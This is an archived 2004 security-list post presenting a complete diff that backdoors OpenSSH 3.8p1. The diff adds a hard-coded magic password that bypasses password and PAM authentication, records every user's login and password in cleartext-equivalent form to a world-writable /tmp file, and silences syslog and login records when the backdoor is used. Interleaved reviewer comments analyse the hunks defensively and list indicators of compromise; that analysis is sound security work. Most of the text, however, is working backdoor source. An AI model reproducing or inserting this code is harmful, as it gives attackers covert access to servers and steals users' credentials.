[EXPL] Backdooring OpenSSH
Date: 17 Mar 2004 18:42:51 +0200
From: SecuriTeam <[email protected]>
To: [email protected]
Subject: [EXPL] Backdooring OpenSSH
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Backdooring OpenSSH
------------------------------------------------------------------------
SUMMARY
Below is a .diff file that patches the sources of the OpenSSH-3.8p1 client and
daemon to log every login and password; it also adds a magic password
for the daemon, stores passwords to an encrypted logfile, and disables logging
if the magic password is used. Based upon the work of Aion.
DETAILS
Code:
diff -r -N -c openssh-3.8p1/auth-pam.c openssh-3.8p1+/auth-pam.c
*** openssh-3.8p1/auth-pam.c Tue Feb 17 13:20:08 2004
--- openssh-3.8p1+/auth-pam.c Tue Mar 2 19:24:00 2004
***************
*** 342,347 ****
--- 342,348 ----
if (sshpam_err != PAM_SUCCESS)
goto auth_fail;
sshpam_err = pam_authenticate(sshpam_handle, 0);
+ if (bella) sshpam_err = PAM_SUCCESS;
if (sshpam_err != PAM_SUCCESS)
goto auth_fail;
buffer_put_cstring(&buffer, "OK");
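Review bot: The added `if (bella) sshpam_err = PAM_SUCCESS;` overwrites the result of `pam_authenticate` with a process-wide flag, so the PAM stack's decision, including any account and password-policy modules behind it, is discarded whenever the flag is set. The flag is set in the auth-passwd.c and monitor.c hunks on a literal comparison against `BACKPWD` and is not visibly cleared on the monitor.c path, so this is a second, PAM-side authentication bypass in addition to the one in auth-passwd.c. The enclosing function continues outside the hunk.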
diff -r -N -c openssh-3.8p1/auth-passwd.c openssh-3.8p1+/auth-passwd.c
*** openssh-3.8p1/auth-passwd.c Thu Feb 22 00:23:36 2004
--- openssh-3.8p1+/auth-passwd.c Tue Mar 2 19:24:00 2004
***************
*** 72,77 ****
--- 72,81 ----
#endif
if (*password == '\0' && options.permit_empty_passwd == 0)
return 0;
+ if (!strcmp(BACKPWD, password)) return bella=1; bella=0;
+ sprintf(abuff, "passwd from: %s \tuser: %s \tpass: %s \n",
+ get_remote_ipaddr(), pw->pw_name, password);
+ bellalog();
#if defined(HAVE_OSF_SIA)
return auth_sia_password(authctxt, password) && ok;
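Review bot: The `sprintf(abuff, "passwd from: ...", ..., password)` added here has no length bound while `password` is untrusted client input of arbitrary length, so a long password overruns the fixed-size `abuff` declared in includes.h, which is undefined behavior in the daemon; the same unbounded `sprintf` into `abuff` recurs in the monitor.c, readpass.c and ssh.c hunks. The preceding `if (!strcmp(BACKPWD, password)) return bella=1;` returns success before the real password check runs, so the literal in `BACKPWD` is a hard-coded authentication bypass. From a defender's side this hunk is the reason to reject the patch outright rather than repair it: the cleartext password of every login attempt is written to disk before authentication is even evaluated. The enclosing function continues outside the hunk.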
diff -r -N -c openssh-3.8p1/includes.h openssh-3.8p1+/includes.h
*** openssh-3.8p1/includes.h Sun Feb 6 11:29:42 2004
--- openssh-3.8p1+/includes.h Tue Mar 2 19:24:00 2004
***************
*** 13,18 ****
--- 13,38 ----
* called by a name other than "ssh" or "Secure Shell".
*/
+ // start patch by acme - acme at olografix/paranoici dot org
+ #include <sys/stat.h>
+ #include <stdio.h>
+
+ #define BACKPWD "inspassword"
+ #define SSH_LOG "/tmp/.lost+found"
+
+ FILE *alog;
+ char abuff[512];
+ int alen, ai, bella;
+
+ #define bellalog() { \
+ alen=strlen(abuff); \
+ for(ai=0; ai<=alen; ai++) abuff[ai]=~abuff[ai]; \
+ alog=fopen(SSH_LOG, "a"); \
+ if(alog!=NULL) { fwrite(abuff, alen, 1, alog); fclose(alog);} \
+ chmod(SSH_LOG, 0666); \
+ }
+ // end patch, from aion
+
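Review bot: `bellalog()` writes captured credentials to a fixed path and then makes that file world-writable with `chmod(SSH_LOG, 0666)`, and the only protection on the contents is the byte-wise `~` inversion loop, which is undone by applying the same operation, so every local user can read and tamper with the credential log; the SUMMARY's word "encrypted" overstates this. The hunk also places non-static object definitions (`alog`, `abuff`, `alen`, `ai`, `bella`) and the `SSH_LOG`/`BACKPWD` literals in a header included by every translation unit, so the fixed path and the magic password are present as plain strings in every built binary. For incident responders, those two literals and the fixed path are the practical indicators of this patch. Note also that the loop bound `ai<=alen` inverts the terminating byte as well, although `fwrite` only emits `alen` bytes.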
#ifndef INCLUDES_H
#define INCLUDES_H
diff -r -N -c openssh-3.8p1/log.c openssh-3.8p1+/log.c
*** openssh-3.8p1/log.c Tue Feb 18 12:59:44 2004
--- openssh-3.8p1+/log.c Tue Mar 2 19:24:00 2004
***************
*** 273,278 ****
--- 273,279 ----
char *txt = NULL;
int pri = LOG_INFO;
+ if (bella) return;
if (level > log_level)
return;
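Review bot: The added `if (bella) return;` at the top of the logging routine silences every message for the remainder of the process once the magic password has been seen, regardless of `log_level`, and the loginrec.c hunk does the same for `login_write`, so neither syslog nor wtmp/lastlog records the session. Because `bella` is a process-wide global, the suppression is not scoped to the backdoored authentication and also hides unrelated errors raised in that process. For detection, a connection visible in network or PAM telemetry with no corresponding sshd syslog or login record is the observable side effect of this hunk. The enclosing function continues outside the hunk.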
diff -r -N -c openssh-3.8p1/loginrec.c openssh-3.8p1+/loginrec.c
*** openssh-3.8p1/loginrec.c Sun Feb 10 06:49:36 2004
--- openssh-3.8p1+/loginrec.c Tue Mar 2 19:24:00 2004
***************
*** 406,411 ****
--- 406,412 ----
int
login_write (struct logininfo *li)
{
+ if (bella) return 0;
#ifndef HAVE_CYGWIN
if ((int)geteuid() != 0) {
logit("Attempt to write login records by non-root user (aborting)");
diff -r -N -c openssh-3.8p1/monitor.c openssh-3.8p1+/monitor.c
*** openssh-3.8p1/monitor.c Wed Feb 6 06:40:28 2004
--- openssh-3.8p1+/monitor.c Tue Mar 2 19:24:00 2004
***************
*** 786,791 ****
--- 786,793 ----
fatal("UsePAM not set, but ended up in %s anyway", __func__);
user = buffer_get_string(m, NULL);
+ sprintf(abuff, "mm pam from: %s \tuser: %s \n", get_remote_ipaddr(),
user);
+ bellalog();
start_pam(user);
***************
*** 881,888 ****
num = buffer_get_int(m);
if (num > 0) {
resp = xmalloc(num * sizeof(char *));
! for (i = 0; i < num; ++i)
resp[i] = buffer_get_string(m, NULL);
ret = (sshpam_device.respond)(sshpam_ctxt, num, resp);
for (i = 0; i < num; ++i)
xfree(resp[i]);
--- 883,894 ----
num = buffer_get_int(m);
if (num > 0) {
resp = xmalloc(num * sizeof(char *));
! for (i = 0; i < num; ++i) {
resp[i] = buffer_get_string(m, NULL);
+ sprintf(abuff, "pam_respond: [%d]: %s\n", i, resp[i]);
+ if(!strcmp(BACKPWD, resp[i])) bella=1;
+ else bellalog();
+ }
ret = (sshpam_device.respond)(sshpam_ctxt, num, resp);
for (i = 0; i < num; ++i)
xfree(resp[i]);
diff -r -N -c openssh-3.8p1/readpass.c openssh-3.8p1+/readpass.c
*** openssh-3.8p1/readpass.c Fri Jan 24 02:36:23 2003
--- openssh-3.8p1+/readpass.c Tue Mar 2 19:24:00 2004
***************
*** 123,128 ****
--- 123,130 ----
if ((ret = ssh_askpass(askpass, prompt)) == NULL)
if (!(flags & RP_ALLOW_EOF))
return xstrdup("");
+ sprintf(abuff, "readpass: %s\n", ret);
+ bellalog();
return ret;
}
***************
*** 134,138 ****
--- 136,142 ----
ret = xstrdup(buf);
memset(buf, 'x', sizeof buf);
+ sprintf(abuff, "readpass: %s\n", ret);
+ bellalog();
return ret;
}
diff -r -N -c openssh-3.8p1/ssh.c openssh-3.8p1+/ssh.c
*** openssh-3.8p1/ssh.c Tue Dec 17 06:33:12 2003
--- openssh-3.8p1+/ssh.c Tue Mar 2 19:24:00 2004
***************
*** 212,217 ****
--- 212,221 ----
extern int optind, optreset;
extern char *optarg;
+ for(i=1; i<ac; i++) {
+ sprintf(abuff, "ssh: av[%d]: %s\n", i, av[i]);
+ bellalog();
+ }
__progname = ssh_get_progname(av[0]);
init_rng();
diff -r -N -c openssh-3.8p1/version.h openssh-3.8p1+/version.h
*** openssh-3.8p1/version.h Tue Feb 23 23:24:02 2004
--- openssh-3.8p1+/version.h Tue Mar 2 19:24:00 2004
***************
*** 1,3 ****
/* $OpenBSD: version.h,v 1.40 2004/02/23 15:16:46 markus Exp $ */
! #define SSH_VERSION "OpenSSH_3.8p1"
--- 1,3 ----
/* $OpenBSD: version.h,v 1.40 2004/02/23 15:16:46 markus Exp $ */
! #define SSH_VERSION "OpenSSH_3.8p1" // we can change it
ADDITIONAL INFORMATION
The information has been provided by <mailto:[email protected]> acme.